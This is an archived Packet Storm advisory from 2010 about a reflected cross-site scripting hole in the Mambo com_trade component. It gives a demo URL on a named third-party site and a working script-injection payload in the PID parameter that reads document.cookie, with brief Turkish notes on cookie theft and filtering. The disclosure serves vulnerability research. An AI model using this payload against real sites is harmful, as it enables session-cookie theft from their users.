Mambo Trade Cross Site Scripting

2010-10-11T00:00:00
ID PACKETSTORM:94603
Type packetstorm
Reporter Fl0riX
Modified 2010-10-11T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
mambo Component trade XSS Vulnerability   
#############################################################  
  
# author : Fl0riX ~ Bug Researchers  
  
# Name : Mambo Com_trade  
  
# Bug Type : Cross Site Scripting  
  
# Infection : Cookieler Çalýnabilir  
  
# Demo Vuln :  
http://www.tarker96.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS]  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
/index.php?option=com_trade&task=product_info&Itemid=florix&PID="><script>alert(document.cookie)</script>  
  
< -- bug code end of -- >   
`